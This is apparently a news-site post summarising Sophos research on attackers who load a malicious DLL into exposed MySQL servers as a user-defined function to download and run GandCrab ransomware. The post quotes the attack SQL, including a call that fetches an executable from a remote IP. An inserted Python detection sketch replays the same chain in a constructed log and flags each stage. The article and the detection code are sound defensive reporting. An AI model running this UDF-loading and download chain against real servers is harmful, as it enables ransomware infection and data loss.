
posted by Fnord666 on Monday May 27 2019, @09:13PM
from the don't-do-that dept.

Sophos has uncovered a wave of attacks targeting servers running MySQL on Windows.

The attack delivers the GandCrab ransomware.

The attackers attempt to connect to the database server and establish that it is running a MySQL instance.

Then, the attacker uses the "set" command to load all the bytes composing the helper DLL into a variable in memory and writes the contents of that variable out to a database table named yongger2.

The attacker concatenates the bytes into one file and drops them into the server's plugin directory. The analysis of the DLL revealed it is used to add the xpdl3, xpdl3_deinit, and xpdl3_init functions to the database.

The attacker then drops the yongger2 table and the function xpdl3, if one already exists. At this point the attacker uses the following SQL command to create a database function (also named xpdl3) that is used to invoke the DLL:

CREATE FUNCTION xpdl3 RETURNS STRING SONAME 'cna12.dll'

The command to invoke the xpdl3 function is:

select xpdl3('hxxp://172.96.14.134:5471/3306-1[.]exe','c:\\isetup.exe')

Using this attack scheme, the attacker instructs the database server to download the GandCrab payload from the remote machine, drop it in the root of the C: drive under the name isetup.exe, and execute it.
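As an added example (not from the Sophos write-up or the article), here is a Python detection sketch for the chain just described, run over a constructed MySQL general-log excerpt: it flags each stage, groups hits per connection, and checks the secure_file_priv setting that decides whether SELECT ... INTO DUMPFILE can write a library into the plugin directory. The log format, the staging statements and the IP address are assumptions; only the table, function and file names come from the article.

```python
import re

# Constructed MySQL general-log excerpt (not a real log) mirroring the chain in the
# article: bytes staged with SET, written to a table, dumped into the plugin directory,
# registered with CREATE FUNCTION ... SONAME, then invoked with a download URL.
SAMPLE_LOG = r"""2019-05-01T10:00:01Z 12 Query set @a = concat('', 0x4d5a90000300000004000000ffff0000)
2019-05-01T10:00:02Z 12 Query insert into yongger2 values (@a)
2019-05-01T10:00:03Z 12 Query select data from yongger2 into dumpfile 'C:/mysql/lib/plugin/cna12.dll'
2019-05-01T10:00:04Z 12 Query drop function if exists xpdl3
2019-05-01T10:00:05Z 12 Query CREATE FUNCTION xpdl3 RETURNS STRING SONAME 'cna12.dll'
2019-05-01T10:00:06Z 12 Query select xpdl3('hxxp://198.51.100.7:5471/3306-1.exe','c:\\isetup.exe')
2019-05-01T10:00:07Z 13 Query select id, name from customers where id = 42
"""

LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<conn>\d+)\s+Query\s+(?P<sql>.*)$")

RULES = [  # one rule per stage of the UDF-loading chain
    ("set_hex_blob", re.compile(r"\bset\s+@\w+\s*=.*0x[0-9a-f]{16,}", re.I)),
    ("dumpfile_to_plugin_dir", re.compile(r"\binto\s+dumpfile\s+'[^']*plugin[^']*'", re.I)),
    ("create_udf_soname", re.compile(r"\bcreate\s+function\s+\w+\s+returns\s+\w+\s+soname\s+'", re.I)),
    ("udf_called_with_url", re.compile(r"\bselect\s+\w+\s*\(\s*'(?:hxxp|http|ftp)s?://", re.I)),
]

def scan_general_log(text):
    """Return (conn_id, rule_name, sql) for every general-log line that matches a rule."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            sql = m.group("sql")
            hits += [(int(m.group("conn")), name, sql) for name, rx in RULES if rx.search(sql)]
    return hits

def suspicious_connections(hits, min_stages=2):
    """Connections that tripped >= min_stages distinct rules, or that registered a UDF
    from a shared library at all (that alone warrants a look on a database host)."""
    stages = {}
    for conn, name, _ in hits:
        stages.setdefault(conn, set()).add(name)
    return sorted(c for c, s in stages.items() if len(s) >= min_stages or "create_udf_soname" in s)

def hardening_findings(variables):
    """Check SHOW VARIABLES output: secure_file_priv '' lets SELECT ... INTO DUMPFILE write
    anywhere, plugin_dir included; NULL disables file writes; a directory confines them."""
    if variables.get("secure_file_priv") == "":
        return ["secure_file_priv is empty: DUMPFILE can write a library into plugin_dir"]
    return []
```

Feed it the real general log (or the audit plugin's output) and the result of SHOW VARIABLES to get the same two views: which connections walked the chain, and whether the server configuration would have let them.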

Tracking back through the attack chain, the researchers determined that the malware had been downloaded from the source ~3100 times since mid-April. Each download potentially indicates an infection, although presumably some were, as in Sophos' case, honeypots where no actual damage was done. The user interface of the system hosting the malware (geolocated in Arizona) is in simplified Chinese.

While not a widespread attack by numbers, it does represent a significant risk to MySQL databases exposed online.

  • (Score: 0) by Anonymous Coward on Wednesday May 29 2019, @03:01AM (#848753) (1 child)

    You're totally right that the internet-facing 3306es are stupid misconfiguration. I think we're eye to eye on that.

    But I don't agree about "who were impacted by this" unless you mean by this particular actor under analysis, and not the general vector. The specific actor is just Shodaning for 3360 and taking advantage, and you're right, the odds that this is the only insecurity exposed by those machines are nearly nil.

  • (Score: 2) by NotSanguine on Wednesday May 29 2019, @03:11AM

    Those "impacted" that I referred to were the folks whose MySQL instances were compromised, not the malicious actor(s).

    I'm not sure how you'd think otherwise.

    --
    No, no, you're not thinking; you're just being logical. --Niels Bohr